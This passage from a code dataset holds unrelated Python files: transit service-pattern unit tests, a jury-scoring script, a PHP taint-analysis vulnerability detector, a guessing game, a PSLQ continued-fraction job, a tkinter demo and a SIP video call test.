self.trip_three.direction_id = True\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__empty_list(self, graphutils):\n \"\"\"[Service pattern manager] Empty path list to sorted graph\"\"\"\n graph = mock.MagicMock()\n graphutils.graphdatastructs.DirectedPath.return_value = graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph([])\n\n self.assertEqual(graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_called_once_with([])\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__single_list(self, graphutils):\n \"\"\"[Service pattern manager] Single path list to sorted graph\"\"\"\n path_list = mock.MagicMock()\n path_lists = [path_list]\n graph = mock.MagicMock()\n graphutils.graphdatastructs.DirectedPath.return_value = graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph(path_lists)\n\n self.assertEqual(graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_called_once_with(path_list)\n\n def test_sorted_graph_to_service_pattern(self):\n \"\"\"[Service pattern manager] Sorted graph to service pattern\"\"\"\n label_one = '1'\n label_two = '2'\n path_list = [label_one, label_two]\n graph = graphutils.graphdatastructs.DirectedPath(path_list)\n\n stop_one = mock.MagicMock()\n stop_two = mock.MagicMock()\n label_to_stop = {\n label_one: stop_one,\n label_two: stop_two\n }\n\n expected_sp = models.ServicePattern()\n v_one = 
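# A vectorized form of the knn() in the record above: one broadcasted
# distance computation replaces the per-row Python loop, and the top-k
# majority vote uses Counter. Same Euclidean-distance semantics; a sketch
# assuming only numpy, with synthetic two-cluster data.
import numpy as np
from collections import Counter

def knn_predict(train_x, train_y, query, k=10):
    dists = np.sqrt(((train_x - query) ** 2).sum(axis=1))   # shape (n_train,)
    top_k_labels = train_y[np.argsort(dists)[:k]]
    return Counter(top_k_labels).most_common(1)[0][0]

rng = np.random.default_rng(0)
x = np.vstack([rng.normal(0, 1, (20, 2)), rng.normal(5, 1, (20, 2))])
y = np.array([0] * 20 + [1] * 20)
print(knn_predict(x, y, np.array([4.8, 5.1]), k=5))  # expect 1 (near the second cluster)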
models.ServicePatternVertex()\n v_one.stop = stop_one\n v_one.service_pattern = expected_sp\n v_one.position = 0\n v_two = models.ServicePatternVertex()\n v_two.stop = stop_two\n v_two.service_pattern = expected_sp\n v_two.position = 1\n\n actual_sp = servicepatternmanager._sorted_graph_to_service_pattern(\n graph, label_to_stop)\n\n self.assertEqual(expected_sp, actual_sp)\n self.assertEqual(expected_sp.vertices, actual_sp.vertices)\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__stiches_to_path(self, graphutils):\n \"\"\"[Service pattern manager] Two path lists to sorted graph, just from stitching\"\"\"\n path_list_one = mock.MagicMock()\n path_list_two = mock.MagicMock()\n path_lists = [path_list_one, path_list_two]\n\n directed_path_one = mock.MagicMock()\n directed_path_two = mock.MagicMock()\n\n def DirectedPath(path_list):\n if path_list == path_list_one:\n return directed_path_one\n if path_list == path_list_two:\n return directed_path_two\n raise AttributeError\n\n graphutils.graphdatastructs.DirectedPath.side_effect = DirectedPath\n\n graph = mock.MagicMock()\n graphutils.pathstitcher.stitch.return_value = graph\n graph.is_path.return_value = True\n final_graph = mock.MagicMock()\n graph.cast_to_path.return_value = final_graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph(path_lists)\n\n self.assertEqual(final_graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_two)\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_one)\n graphutils.pathstitcher.stitch.assert_called_once_with([directed_path_one, directed_path_two])\n graph.is_path.assert_called_once_with()\n graph.cast_to_path.assert_called_once_with()\n graphutils.topologicalsort.sort.assert_not_called()\n\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__topological_sort(self, graphutils):\n \"\"\"[Service pattern manager] Two path lists to sorted graph, from top sort\"\"\"\n path_list_one = mock.MagicMock()\n path_list_two = mock.MagicMock()\n path_lists = [path_list_one, path_list_two]\n\n directed_path_one = mock.MagicMock()\n directed_path_two = mock.MagicMock()\n\n def DirectedPath(path_list):\n if path_list == path_list_one:\n return directed_path_one\n if path_list == path_list_two:\n return directed_path_two\n raise AttributeError\n\n graphutils.graphdatastructs.DirectedPath.side_effect = DirectedPath\n\n graph = mock.MagicMock()\n graphutils.pathstitcher.stitch.return_value = graph\n graph.is_path.return_value = False\n final_graph = mock.MagicMock()\n graphutils.topologicalsort.sort.return_value = final_graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph(path_lists)\n\n self.assertEqual(final_graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_two)\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_one)\n graphutils.pathstitcher.stitch.assert_called_once_with([directed_path_one, directed_path_two])\n graph.is_path.assert_called_once_with()\n graph.cast_to_path.assert_not_called()\n graphutils.topologicalsort.sort.assert_called_with(graph)\n\n @mock.patch('transiter.utils.servicepatternmanager._path_lists_to_sorted_graph')\n @mock.patch('transiter.utils.servicepatternmanager._sorted_graph_to_service_pattern')\n def test_construct_for_static_trips(self, _sg_to_sp, _pls_to_sg):\n trips = [self.trip_one, self.trip_two, self.trip_three]\n\n stop_id_to_stop = 
mock.MagicMock()\n\n sorted_graph = mock.MagicMock()\n _pls_to_sg.return_value = sorted_graph\n service_pattern = mock.MagicMock()\n _sg_to_sp.return_value = service_pattern\n\n actual = servicepatternmanager._construct_for_static_trips(\n trips, stop_id_to_stop, {})\n\n self.assertEqual(service_pattern, actual)\n\n _pls_to_sg.assert_called_once_with({('1', '2'), ('3', '4')})\n _sg_to_sp.assert_called_once_with(sorted_graph, stop_id_to_stop)\n\n\n @mock.patch('transiter.utils.servicepatternmanager._filter_trips_by_conditions')\n @mock.patch('transiter.utils.servicepatternmanager._construct_for_static_trips')\n def test_construct_sps_from_gtfs_static_date(self, _filter_trips, _construct):\n\n gtfs_static_parser = gtfsstaticutil.GtfsStaticParser()\n route = mock.MagicMock()\n gtfs_static_parser.route_id_to_route = {\n 'A': route\n }\n gtfs_static_parser.trip_id_to_trip = {\n '1': self.trip_one,\n '2': self.trip_two,\n '3': self.trip_three,\n }\n gtfs_static_parser.stop_id_to_stop = mock.MagicMock()\n\n conditions = mock.MagicMock()\n route_sp_settings = [\n {\n 'name': 'Name 1',\n 'default': True,\n },\n {\n 'name': 'Name 2',\n 'regular': True,\n 'conditions': conditions\n }\n ]\n\n servicepatternmanager.construct_sps_from_gtfs_static_data(\n gtfs_static_parser, route_sp_settings)\n\n self.assertEqual(self.trip_two.stop_ids, ['1', '2'])\n self.assertEqual(self.trip_three.stop_ids, ['4', '3'])\n # TODO add more assertions here\n # Test the names were copied over\n # Test that the right trips were used to construct by filtering in one\n\nclass TestTripsFilter(unittest.TestCase):\n @mock.patch('transiter.utils.servicepatternmanager._TripMatcher')\n def test_filter_trips_by_conditions(self, _TripMatcher):\n trip_matcher = mock.MagicMock()\n _TripMatcher.return_value = trip_matcher\n trip_matcher.match.side_effect = self._dummy_match\n\n good_trips = [self._create_trip(0) for __ in range(10)]\n bad_trips = [self._create_trip(20) for __ in range(10)]\n ugly_trips = [self._create_trip(7) for __ in range(1)]\n\n actual_trips = servicepatternmanager._filter_trips_by_conditions(\n good_trips + bad_trips + ugly_trips, 0.2, None\n )\n\n self.assertListEqual(actual_trips, good_trips)\n\n @staticmethod\n def _dummy_match(trip):\n return trip.stop_ids[0] < 10\n\n @staticmethod\n def _create_trip(key):\n trip = mock.MagicMock()\n trip.stop_ids = [key, 100]\n return trip\n\n\nclass TestTripMatcher(unittest.TestCase):\n\n def setUp(self):\n self.early_weekday_trip = self._create_trip({\n 'start_time': 6,\n 'end_time': 8,\n 'monday': True,\n 'route_id': 'A'\n })\n\n self.mid_weekday_trip = self._create_trip({\n 'start_time': 12,\n 'end_time': 14,\n 'tuesday': True,\n 'route_id': 'A'\n })\n\n self.late_weekday_trip = self._create_trip({\n 'start_time': 22,\n 'end_time': 23,\n 'wednesday': True,\n 'route_id': 'B'\n })\n\n self.early_weekend_trip = self._create_trip({\n 'start_time': 6,\n 'end_time': 8,\n 'sunday': True,\n 'route_id': 'C'\n })\n\n self.trips = [\n self.early_weekday_trip,\n self.mid_weekday_trip,\n self.late_weekday_trip,\n self.early_weekend_trip]\n\n def test_one(self):\n raw_conds = {\n \"weekday\": True,\n \"one_of\": {\n \"starts_earlier_than\": 7,\n \"starts_later_than\": 20\n }\n }\n expected_trips = [self.early_weekday_trip, self.late_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_two(self):\n raw_conds = {\n \"all_of\": {\n \"starts_earlier_than\": 7,\n \"starts_later_than\": 7.01\n 
}\n }\n expected_trips = []\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_three(self):\n raw_conds = {\n \"weekday\": True,\n \"starts_later_than\": 7,\n \"starts_earlier_than\": 20\n }\n expected_trips = [self.mid_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_four(self):\n raw_conds = {\n \"none_of\": {\n \"ends_later_than\": 13,\n }\n }\n expected_trips = [self.early_weekday_trip, self.early_weekend_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_five(self):\n raw_conds = {\n \"all_of\": {\n \"ends_earlier_than\": 11,\n \"weekday\": True,\n }\n }\n expected_trips = [self.early_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_six(self):\n raw_conds = {\n \"weekend\": True\n }\n expected_trips = [self.early_weekend_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_seven(self):\n raw_conds = {\n 'route_id': 'A'\n }\n expected_trips = [self.early_weekday_trip, self.mid_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_eight(self):\n raw_conds = {\n 'route_id': ['B', 'C']\n }\n expected_trips = [self.late_weekday_trip, self.early_weekend_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_nine(self):\n raw_conds = {\n 'unknown_condition': True\n }\n\n self.assertRaises(\n NotImplementedError,\n self._trip_matcher_runner,\n raw_conds,\n self.trips)\n\n\n @staticmethod\n def _trip_matcher_runner(raw_conds, trips):\n trips_matcher = servicepatternmanager._TripMatcher(raw_conds)\n matched_trips = []\n for trip in trips:\n if trips_matcher.match(trip):\n matched_trips.append(trip)\n return matched_trips\n\n @staticmethod\n def _create_trip(attrs):\n trip = gtfsstaticutil.StaticTrip()\n for day in gtfsstaticutil.days:\n trip.__setattr__(day, False)\n for key, value in attrs.items():\n trip.__setattr__(key, value)\n return trip\n\n","sub_path":"tests/unittests/utils/test_servicepatternmanager.py","file_name":"test_servicepatternmanager.py","file_ext":"py","file_size_in_byte":13605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"405179723","text":"people_in_jury = int(input())\npresentation_name = input()\ntotal_presentations = 0\ntotal_scores = 0\n\nwhile presentation_name != \"Finish\":\n scores = 0\n for n in range(1, people_in_jury + 1):\n scores += float(input())\n\n final_score = scores / people_in_jury\n\n print(f\"{presentation_name} - {final_score:.2f}.\")\n total_presentations += 1\n total_scores += final_score\n presentation_name = input()\nelse:\n print(\n f\"Student's final assessment is {total_scores / total_presentations:.2f}.\")\n","sub_path":"Programing Basics Python/Exam Preparations/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15712773","text":"import sys\nimport json\nfrom itertools import islice\nfrom pprint import 
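# The shape of the condition language these tests exercise, reduced to a few
# predicate combinators: leaf conditions test one trip attribute, and
# all_of / one_of / none_of nest arbitrarily. An illustrative
# re-implementation, not the transiter _TripMatcher itself; an unknown leaf
# raises KeyError here where the real matcher raises NotImplementedError.
LEAVES = {
    'starts_earlier_than': lambda trip, v: trip['start_time'] < v,
    'starts_later_than':   lambda trip, v: trip['start_time'] > v,
    'weekday':             lambda trip, v: trip['weekday'] == v,
}

def matches(trip, conds):
    results = []
    for key, value in conds.items():
        if key == 'all_of':
            results.append(all(matches(trip, {k: v}) for k, v in value.items()))
        elif key == 'one_of':
            results.append(any(matches(trip, {k: v}) for k, v in value.items()))
        elif key == 'none_of':
            results.append(not any(matches(trip, {k: v}) for k, v in value.items()))
        else:
            results.append(LEAVES[key](trip, value))
    return all(results)

early = {'start_time': 6, 'weekday': True}
late = {'start_time': 22, 'weekday': True}
cond = {'weekday': True, 'one_of': {'starts_earlier_than': 7, 'starts_later_than': 20}}
assert matches(early, cond) and matches(late, cond)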
pprint\n\nfrom Vulnerable import Vulnerable\nfrom getters import *\n\n\ndef id_nodes(ast):\n\tid = 0\n\tstack = [ast]\n\t\n\twhile stack:\n\t\tnode = stack.pop()\n\t\tnode['id'] = id\n\t\tid += 1\n\t\t\n\t\tfor k, v in node.iteritems():\n\t\t\tif isinstance(v, dict):\n\t\t\t\tstack.append(v)\n\t\t\t\t\n\t\t\telif isinstance(v, list):\n\t\t\t\tfor n in v:\n\t\t\t\t\tstack.append(n)\n\t\n\treturn ast\n\n\n# returns a list of vulnerability patterns\ndef get_patterns(file_dir, display = False):\n\tprint(\"importing vulnerability patterns from\" + file_dir)\n\twith open(file_dir, 'r') as fp:\n\t\tpatterns = []\n\t\t\n\t\twhile True:\n\t\t\tfield = list(islice(fp, 5))\n\t\t\t\n\t\t\tif field:\n\t\t\t\tfield = [x for x in field if x !='\\n']\t\t\n\t\t\t\tpattern = Vulnerable(field[0], field[1].split(','), field[2].split(','), field[3].split(','))\n\t\t\t\tpatterns.append(pattern)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\n\t\treturn patterns\n\n\ndef path_from_sink_to_entry(ast, node, patterns):\n\t\n\tif node['kind'] == \"call\":\n\t\t\n\t\t# check if function is a sanitization function\n\t\tfor pattern in patterns:\n\t\t\tif node['what']['name'] in pattern.validation_funcs:\n\t\t\t\treturn None\n\t\t\n\t\tfor arg in node['arguments']:\n\t\t\tpath = path_from_sink_to_entry(ast, arg, patterns)\n\t\t\tif path is not None:\n\t\t\t\tpath.append(node['what']['name'])\n\t\t\t\treturn path\n\t\t\t\t\n\telif node['kind'] == \"echo\":\n\t\t#TODO maybe add more functions like echo\n\t\tfor arg in node['expressions']:\n\t\t\tpath = path_from_sink_to_entry(ast, arg, patterns)\n\t\t\tif path is not None:\n\t\t\t\tpath.append(node['kind'])\n\t\t\t\treturn path\n\t\t\n\t\t\n\telif node['kind'] == \"offsetlookup\":\n\t\t# check if variable is an entry point\n\t\tfor pattern in patterns:\n\t\t\tif node['what']['name'] in pattern.entry_points:\n\t\t\t\tentry = node['what']['name'] + \"['\" + node['offset']['value'] + \"']\"\n\t\t\t\t\n\t\t\t\treturn [entry]\n\t\t\n\t\t\n\telif node['kind'] == \"variable\":\n\t\tassign = get_assignment(ast, node)\n\t\tprint(\"das\")\n\t\tprint(assign)\n\t\tif assign is not None:\n\t\t\tpath = path_from_sink_to_entry(ast, assign['right'], patterns)\n\t\t\t\n\t\t\tif path is not None:\n\t\t\t\tpath.append(node['name'])\n\t\t\t\treturn path\n\t\t\n\t\t\n\telif node['kind'] == \"if\":\n\t\tprint(\"no if is implemented\")\n\t\t\n\t\t\n\telif node['kind'] == \"while\":\n\t\tprint(\"no while is implemented\")\n\t\t\n\t\t\n\telse:\n\t\tnodesOfInterest = get_functions(node) + get_variables(node)\n\t\tfor n in nodesOfInterest:\n\t\t\tpath = path_from_sink_to_entry(ast, n, patterns)\n\t\t\tif path is not None:\n\t\t\t\treturn path\n\t\n\t# default return null\n\treturn None\n\n\n\ndef check_vulnerability(file_dir, patterns):\n\n\tprint(\"analyzing \" + file_dir)\n\twith open(file_dir) as fp:\n\t\tast = json.load(fp)\n\t\n\tfunctions = get_functions(ast)\n\tsinks = []\n\tsubpatterns = []\n\tfor pattern in patterns:\n\t\tfor function in functions:\n\t\t\tif function not in sinks:\n\t\t\t\tif function['kind'] == \"call\":\n\t\t\t\t\tname = function['what']['name']\n\t\t\t\telse:\n\t\t\t\t\tname = function['kind']\n\t\t\t\t\t\n\t\t\t\tif name in pattern.sensitive_sinks:\n\t\t\t\t\tsinks.append(function)\n\t\t\t\t\tsubpatterns.append(pattern)\n\n\t# id the AST nodes to distinguish x=x assignments\n\tast = id_nodes(ast)\t\n\tpath = None\n\t\n\t# find path from sinks to a possible entry point\n\tfor sink in sinks:\n\t\t# print(sink)\n\t\tpath = path_from_sink_to_entry(ast, sink, 
subpatterns)\n\t\tif path is not None:\n\t\t\tbreak\n\t\t\n\t# compute the result\n\tif path is None:\n\t\tresult = 'Vulnerability: None\\n'\n\t\t\n\telse:\n\t\tresult = \"\"\n\t\tfor element in path:\n\t\t\tfor subpattern in subpatterns:\n\t\t\t\tif element not in subpattern.validation_funcs:\n\t\t\t\t\tresult += \"Vulnerability: \" + subpattern.name + \"\\n\" \\\n\t\t\t\t\t\t\t+ \"Entry point: \" + path[0] + \"\\n\" \\\n\t\t\t\t\t\t\t+ \"Sensitive Sink: \" + path[-1] + \"\\n\"\n\t\t\t\t\treturn result\n\n\treturn result\n\n\n","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"332495807","text":"import random\n\n\"\"\"This module contain a function guess which is a guess game.\"\"\"\n\ndef guessGame():\n\n \"\"\"you have enter a randome choice b/w 1,50 if you guess correct then you will win else you \\\n you have only 5 chances.\n\n \"\"\"\n comGuess = random.randint(1,100)\n\n c = 1\n\n while c:\n\n userGuess = int(input(\"Enter Your Guess - \"))\n\n if comGuess < userGuess :\n\n print(\"Think Lower Be in your limits \")\n\n elif comGuess > userGuess :\n\n print(\"Be Big Think Big \")\n\n else:\n\n print(\"Yeah!!You have won the game\")\n break\n \n if c == 5 :\n\n print(\"You such a looser\")\n break\n \n\n else:\n\n c += 1\n \n\nif __name__ == \"__main__\" :\n\n guessGame()\n","sub_path":"New_morning_batch/new/mypkg/mymod/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"403865626","text":"from db import models\nfrom db import ramanujan_db\nimport mpmath as mp\nimport time\nfrom sqlalchemy import Integer, or_, Float\nfrom sqlalchemy.orm.attributes import flag_modified\nfrom sqlalchemy.sql.expression import func\nfrom jobs import pslq_utils\nimport logging\nimport logging.config\nimport sys\nimport os\n\nmp.mp.dps = 2000\n\nALGORITHM_NAME = 'PSLQ_CF_CONST'\nLOGGER_NAME = 'job_logger'\nBULK_SIZE = 500\n\nFILTERS = [\n models.Cf.precision_data != None,\n models.Cf.precision_data.has(models.CfPrecision.precision > 100),\n models.Cf.precision_data.has(models.CfPrecision.general_data != None),\n models.Cf.precision_data.has(models.CfPrecision.general_data['rational'].cast(Float) == 0.0),\n or_(models.Cf.scanned_algo == None, ~models.Cf.scanned_algo.has_key(ALGORITHM_NAME))\n ]\n\ndef get_filters(num_denom_factor):\n filters = FILTERS\n if num_denom_factor is not None:\n factor, strict = num_denom_factor\n num_deg = func.cardinality(models.Cf.partial_numerator) - 1\n denom_deg = func.cardinality(models.Cf.partial_denominator) - 1\n if factor > 0:\n low_deg = denom_deg * factor\n high_deg = num_deg\n else:\n low_deg = num_deg * abs(factor)\n high_deg = denom_deg\n\n if strict:\n new_filter = low_deg == high_deg\n else:\n new_filter = low_deg <= high_deg\n\n filters = [new_filter] + filters\n\n return filters \n\ndef check_cf_to_const(cf_value, const_value):\n if const_value == 1:\n return None\n\n result = pslq_utils.check_int_null_vector(mp.mpf(str(const_value)), cf_value)\n if result:\n logging.getLogger(LOGGER_NAME).info('Found connection')\n\n return result\n\ndef check_cf(cf, constants):\n logging.getLogger(LOGGER_NAME).info(f'checking cf: {cf.cf_id}: {cf.partial_numerator}, {cf.partial_denominator}')\n connection_data = None\n cf_precision = cf.precision_data.precision\n for const in constants:\n 
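# The core idea of path_from_sink_to_entry above on a toy AST: walk from a
# sink's arguments back toward entry points, stop when a sanitizer
# intervenes, and report the entry-to-sink chain. The node shapes here are
# simplified stand-ins for the php-parser JSON the real code consumes.
ENTRY_POINTS = {'$_GET', '$_POST'}
SANITIZERS = {'htmlspecialchars'}

def trace(node):
    if node['kind'] == 'entry':
        base = node['name'].split('[')[0]
        return [node['name']] if base in ENTRY_POINTS else None
    if node['kind'] == 'call':
        if node['name'] in SANITIZERS:
            return None                      # sanitized: taint stops here
        for arg in node['args']:
            path = trace(arg)
            if path is not None:
                return path + [node['name']]
    return None

tainted = {'kind': 'call', 'name': 'echo',
           'args': [{'kind': 'call', 'name': 'strtolower',
                     'args': [{'kind': 'entry', 'name': "$_GET['q']"}]}]}
safe = {'kind': 'call', 'name': 'echo',
        'args': [{'kind': 'call', 'name': 'htmlspecialchars',
                  'args': [{'kind': 'entry', 'name': "$_GET['q']"}]}]}
print(trace(tainted))       # ["$_GET['q']", 'strtolower', 'echo']
assert trace(safe) is None  # sanitizer breaks the path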
logging.getLogger(LOGGER_NAME).debug(f'checking const {const.name} with cf {cf.cf_id}')\n mp.mp.dps = min(const.precision, cf_precision) * 9 // 10\n cf_value = mp.mpf(str(cf.precision_data.previous_calc[2])) / mp.mpf(str(cf.precision_data.previous_calc[3]))\n result = check_cf_to_const(cf_value, const.value)\n if result:\n if connection_data:\n # TODO: Report because we found 2 different constants\n logging.getLogger(LOGGER_NAME).critical(f'found connection to multiple constants. cf_id: {cf.cf_id}')\n connection_data = models.CfConstantConnection(cf_id=cf.cf_id, constant_id=const.constant_id, connection_type=\"PSLQ\", connection_details=result)\n \n return connection_data\n\ndef execute_job(query_data):\n logging.config.fileConfig('logging.config', defaults={'log_filename': f'pslq_const_worker_{os.getpid()}'})\n db_handle = ramanujan_db.RamanujanDB()\n connections = []\n cfs = []\n for cf in query_data:\n connection_data = check_cf(cf, db_handle.constants)\n if connection_data:\n connections.append(connection_data)\n if not cf.scanned_algo:\n cf.scanned_algo = dict()\n cf.scanned_algo[ALGORITHM_NAME] = int(time.time())\n # for postgres < 9.4\n flag_modified(cf, 'scanned_algo')\n cfs.append(cf)\n logging.getLogger(LOGGER_NAME).info(f'finished - worked on {len(cfs)} cfs - found {len(connections)} results')\n db_handle.session.add_all(cfs)\n db_handle.session.add_all(connections)\n db_handle.session.commit()\n db_handle.session.close()\n \n logging.getLogger(LOGGER_NAME).info(f'Commit done')\n\n return len(cfs), len(connections)\n\ndef run_query(bulk=0, num_denom_factor=None):\n logging.config.fileConfig('logging.config', defaults={'log_filename': f'pslq_const_manager'})\n if not bulk:\n bulk = BULK_SIZE\n logging.getLogger(LOGGER_NAME).debug(f'Starting to check connections, bulk size: {bulk}')\n db_handle = ramanujan_db.RamanujanDB()\n results = db_handle.session.query(models.Cf).filter(*get_filters(num_denom_factor)).limit(bulk).all()\n db_handle.session.close()\n logging.getLogger(LOGGER_NAME).info(f'size of batch is {len(results)}')\n return results\n\ndef summarize_results(results):\n total_cfs = 0\n total_connections = 0\n for cfs, connections in results:\n total_cfs += cfs\n total_connections += connections\n logging.getLogger(LOGGER_NAME).info(f'Total iteration over: {total_cfs} cfs, found {total_connections} connections')\n\ndef run_one(cf_id, db_handle,write_to_db=False):\n #db_handle = ramanujan_db.RamanujanDB()\n cf = db_handle.session.query(models.Cf).filter(models.Cf.cf_id == cf_id).first()\n connection_data = check_cf(cf, db_handle.constants)\n if write_to_db:\n if not cf.scanned_algo:\n cf.scanned_algo = dict()\n cf.scanned_algo[ALGORITHM_NAME] = int(time.time())\n # for postgres < 9.4\n flag_modified(cf, 'scanned_algo')\n\n db_handle.session.add_all([cf])\n if connection_data:\n db_handle.session.add_all([connection_data])\n db_handle.session.commit()\n # db_handle.session.close()\n\n return connection_data\n","sub_path":"jobs/job_const_cf_pslq.py","file_name":"job_const_cf_pslq.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"611469095","text":"import tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('my window')\nwindow.geometry('200x200')\n\n# Create a Label\nl = tk.Label(window, bg='yellow', width=20, text=None)\nl.pack()\n\n# Function for Checkbutton\ndef print_selection():\n if (var1.get() == 1) and (var2.get() == 0):\n l.config(text='I love only Python')\n elif 
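# What the PSLQ check in the job above amounts to, using mpmath's built-in
# pslq: given a continued-fraction value x and a constant y, look for small
# integers (a, b, c, d) with a*x*y + b*x + c*y + d = 0 (a Mobius relation).
# The values below are a toy pair with a known relation, not real database
# rows; precision and tolerance are illustrative.
from mpmath import mp, mpf, pslq

mp.dps = 50
y = mp.pi
x = (3 * y + 1) / (y + 2)              # constructed so that x*y + 2*x - 3*y - 1 = 0
rel = pslq([x * y, x, y, mpf(1)], tol=mpf(10) ** -40)
print(rel)                             # -> [1, 2, -3, -1] (up to overall sign)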
(var1.get() == 0) and (var2.get() == 1):\n l.config(text='I love only C++')\n elif (var1.get() == 0) and (var2.get() == 0):\n l.config(text='I don\\'t love either')\n else:\n l.config(text='I love both')\n\nvar1 = tk.IntVar()\nvar2 = tk.IntVar()\n# Define Checkbutton\n# onvalue means the represented value when selected\nc1 = tk.Checkbutton(window, text='Python',variable=var1, onvalue=1, offvalue=0,\n command=print_selection)\nc2 = tk.Checkbutton(window, text='C++',variable=var2, onvalue=1, offvalue=0,\n command=print_selection)\nc1.pack()\nc2.pack()\n\n\nwindow.mainloop()\n","sub_path":"gui_checkbutton.py","file_name":"gui_checkbutton.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186039533","text":"\"\"\"\nCopyright (c) 2018 Cisco Systems, Inc.\n\nAuthor:\n Christian Oeien \n\"\"\"\nfrom tng.api import runner\nfrom tng.device.endpoint.synergylite_3pcc import BigEasyVideo3pcc\nfrom tng_sl.contrib.pitstop_helper import PitstopTestCase\nfrom pitstop.exp import Send, Receive, Command, Poll, LocalAnswer, Wait, Flag\n\n\nclass Test(PitstopTestCase):\n\n required_caps = ['video']\n\n def test_originate_and_resume_video(self):\n '''\n have DUT originate new call. Offer must include a video media line,\n given a video capable DUT. Also verify same behaviour on resume SDP\n and in this case the far-end as opposed to DUT, initiates the hangup\n MPP Behavior: Video m line is deleted on a Hold-offer for audio calls\n on video phones.\n Bonus: -that video is not enabled on peer so DUT adds at each offer.\n -verify video-parameters announced like the profile-level-id.\n -star-syntax when zero-porting is parsed by DUT i.e no crash.\n '''\n\n offer_verify = [\n (\"\\n\", \"profile-level-id=42\"),\n (\"\\n\", \"profile-level-id=64\"),\n (\"\\n\", \"packetization-mode=0\")]\n\n api = self.oPhone1.ccapi\n cid = \"0000\" # <-- you know 1st call on 1st line is default on .dut\n self.spec.update({\n \"test\": [\n Wait(\"idle\").then([\n Command(self.dut.make_call, \"0\")]),\n Receive(\n \"INVITE\", {}, transaction_label=\"i\",\n captures={\"a\": \"\\n(^v=0.+video.+)\"},\n verify=offer_verify).then([\n Send(\"180\", {}, on_transaction=\"i\")]),\n Poll(self.dut.is_proceeding).then([\n LocalAnswer(\"$a\", \"A\"),\n Send(\n \"200\", {\"\\n\": \"$A\"},\n on_transaction=\"i\", dialog_label=\"d\")]),\n Receive(\"ACK\", {}, in_dialog=\"d\").then([\n Command(api.hold, cid)]),\n Receive(\n \"INVITE\", {}, transaction_label=\"j\", in_dialog=\"d\",\n captures={\"b\": \"\\n(^v=0.+audio.+a=sendonly.+)\"}).then([\n LocalAnswer(\"$b\", \"B\"),\n Send(\"200\", {\"\\n\": \"$B\"}, on_transaction=\"j\")]),\n Receive(\"ACK\", {}, in_dialog=\"d\").then([\n Command(api.resume, cid)]),\n Receive(\n \"INVITE\", {}, transaction_label=\"k\", in_dialog=\"d\",\n captures={\"c\": \"\\n(^v=0.+video [^0].+)\"},\n verify=offer_verify).then([\n LocalAnswer(\"$c\", \"C\"),\n Send(\"200\", {\"\\n\": \"$C\"}, on_transaction=\"k\")]),\n Receive(\"ACK\", {}, in_dialog=\"d\").then([\n Send(\"BYE\", {}, in_dialog=\"d\", transaction_label=\"q\")]),\n Receive(\"200\", {}, on_transaction=\"q\").then([]),\n Poll(self.dut.is_line_idle).then([Flag(\"idle\")])]})\n\n self.pitstop()\n\n\ndef main():\n runner()\n","sub_path":"pitstop_tests/video/originate_and_resume_video.py","file_name":"originate_and_resume_video.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
